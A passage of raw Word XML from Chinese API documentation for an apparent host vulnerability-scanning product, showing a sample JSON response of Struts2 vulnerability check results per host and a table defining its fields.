    <w:p w14:paraId="712BCDAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387DE147" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "27b1a655e425a833",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042018000035",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "title": "Struts2 S2-056拒绝服务漏洞(CVE-2018-1327)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "58.49.121.58",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "www.mycluster.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group": 866,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "code": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "主机</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>在线"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "27b1a655e425a833",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042017002041",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "Struts2 S2-053远程代码执行漏洞(CVE-2017-12611)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "58.49.121.58",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "www.mycluster.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group": 866,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "code": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "主机</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>在线"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "27b1a655e425a833",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042017002040",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "Struts2 S2-052远程代码执行漏洞(CVE-2017-9805)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "58.49.121.58",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "www.mycluster.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group": 866,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "code": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "主机</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>在线"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "27b1a655e425a833",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042013001856",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "Struts2 S2-016远程命令执行漏洞(CVE-2013-2251)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.77.199",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "58.49.121.58",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "www.mycluster.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group": 866,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "code": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "主机</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>在线"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 11,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503837A2"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300"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1594"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="09F1B43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7BB2FB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0321A472" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CAE68A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="79329AA4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="189AD7BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0752D430" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FA2F235" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="33143FEE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2563790B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74277163" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2835CD5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="300ECA0A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AE54A74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39661870" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CC4416E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>漏洞检测项名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="428F5A54" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4269BA7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D24844F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CF4B34D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B2B1D55" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10891BB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76F7FA3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2247E50E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2ED7035A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00111828" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AD85494" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48318563" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="114B736D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09A86C1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D4854E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AEDD684" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4530EB4F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1697DE9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B43E17C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="562E3194" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03FB3284" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00C008CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="621E3E71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D4E6811" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="201AF61B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56CD995D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28817375" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09370DD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0EFFF0D0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45602D18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15AECFE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E6AB71E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>失败码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A93F25F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BC6193B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49C2B2B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D4EFEDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48C6060C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="243" w:name="_Toc115166196"/>
      <w:bookmarkStart w:id="244" w:name="用户所有漏洞作业查询"/>
      <w:bookmarkEnd w:id="242"/>
      <w:r>
        <w:t>用户所有漏洞作业查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w14:paraId="6FE2C489" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
